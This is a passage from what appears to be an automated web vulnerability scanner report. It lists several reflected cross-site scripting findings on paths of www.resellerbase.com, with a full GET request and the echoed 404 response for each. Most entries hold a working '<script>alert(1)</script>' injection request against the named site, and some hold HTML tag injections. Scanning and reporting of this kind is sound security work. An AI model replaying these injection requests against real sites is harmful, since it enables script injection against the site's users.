<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.phpd3a33<script>alert(1)</script>b1b63546391 was not found on this server.</p>
...[SNIP]...

2.1939. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af29e<script>alert(1)</script>151ec437c17fc9bbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/26/rating.phpaf29e<script>alert(1)</script>151ec437c17fc9bbb?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.phpaf29e<script>alert(1)</script>151ec437c17fc9bbb?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1940. http://www.resellerbase.com/detail/26/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 75a6e<script>alert(1)</script>d68502ca322eb2359 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/26/rating.php/75a6e<script>alert(1)</script>d68502ca322eb2359?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.php/75a6e<script>alert(1)</script>d68502ca322eb2359?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1941. http://www.resellerbase.com/detail/26/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70e12<script>alert(1)</script>499c33954fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/rating.php?70e12<script>alert(1)</script>499c33954fb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.php?70e12<script>alert(1)</script>499c33954fb=1 was not found on this server.</p>
...[SNIP]...

2.1942. http://www.resellerbase.com/detail/26/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c63a3<script>alert(1)</script>89e8b836150 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc63a3<script>alert(1)</script>89e8b836150/26/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc63a3<script>alert(1)</script>89e8b836150/26/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1943. http://www.resellerbase.com/detail/26/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8e87<script>alert(1)</script>76c1e19045b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26f8e87<script>alert(1)</script>76c1e19045b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26f8e87<script>alert(1)</script>76c1e19045b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1944. http://www.resellerbase.com/detail/26/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f113d<script>alert(1)</script>4e496116c1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/search.phpf113d<script>alert(1)</script>4e496116c1d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.phpf113d<script>alert(1)</script>4e496116c1d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1945. http://www.resellerbase.com/detail/26/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 39948<a>35d5c66b799 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search39948<a>35d5c66b799&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...&Submit3=Search39948<a>35d5c66b799&opt=2 was not found on this server.</p>
...[SNIP]...

2.1946. http://www.resellerbase.com/detail/26/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 46348<a>4a085a2a19c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/26/search.php?keyword=search...46348<a>4a085a2a19c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...46348<a>4a085a2a19c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1947. http://www.resellerbase.com/detail/26/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5fa46<script>alert(1)</script>f5391158f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search&opt=2&5fa46<script>alert(1)</script>f5391158f69=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...&Submit3=Search&opt=2&5fa46<script>alert(1)</script>f5391158f69=1 was not found on this server.</p>
...[SNIP]...

2.1948. http://www.resellerbase.com/detail/26/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ab1ad<a>756d7243e49 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search&opt=2ab1ad<a>756d7243e49 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...&Submit3=Search&opt=2ab1ad<a>756d7243e49 was not found on this server.</p>
...[SNIP]...

2.1949. http://www.resellerbase.com/detail/26/sitesinstantly-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/sitesinstantly-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e52e1<script>alert(1)</script>0af6778c7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile52e1<script>alert(1)</script>0af6778c7b/26/sitesinstantly-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile52e1<script>alert(1)</script>0af6778c7b/26/sitesinstantly-com.html was not found on this server.</p>
...[SNIP]...

2.1950. http://www.resellerbase.com/detail/26/sitesinstantly-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/26/sitesinstantly-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5861b<a>2ba66e5d214 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/265861b<a>2ba66e5d214/sitesinstantly-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/265861b<a>2ba66e5d214/sitesinstantly-com.html was not found on this server.</p>
...[SNIP]...

2.1951. http://www.resellerbase.com/detail/26/sitesinstantly-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/sitesinstantly-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1fbf<script>alert(1)</script>0fec5c636ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/a1fbf<script>alert(1)</script>0fec5c636ce HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/a1fbf<script>alert(1)</script>0fec5c636ce was not found on this server.</p>
...[SNIP]...

2.1952. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9719e<script>alert(1)</script>47e64864df1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9719e<script>alert(1)</script>47e64864df1/26/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9719e<script>alert(1)</script>47e64864df1/26/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1953. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bace<script>alert(1)</script>68b6e766ad0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/269bace<script>alert(1)</script>68b6e766ad0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/269bace<script>alert(1)</script>68b6e766ad0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1954. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69d1c<script>alert(1)</script>303ee9f0e77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes69d1c<script>alert(1)</script>303ee9f0e77/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes69d1c<script>alert(1)</script>303ee9f0e77/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1955. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 14390<script>alert(1)</script>35cadb236d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos14390<script>alert(1)</script>35cadb236d/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos14390<script>alert(1)</script>35cadb236d/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1956. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a80b5<script>alert(1)</script>a3d9076dbc1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/imagesa80b5<script>alert(1)</script>a3d9076dbc1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/imagesa80b5<script>alert(1)</script>a3d9076dbc1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1957. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4efdf<script>alert(1)</script>8be84185e6c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/images/rating4efdf<script>alert(1)</script>8be84185e6c/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
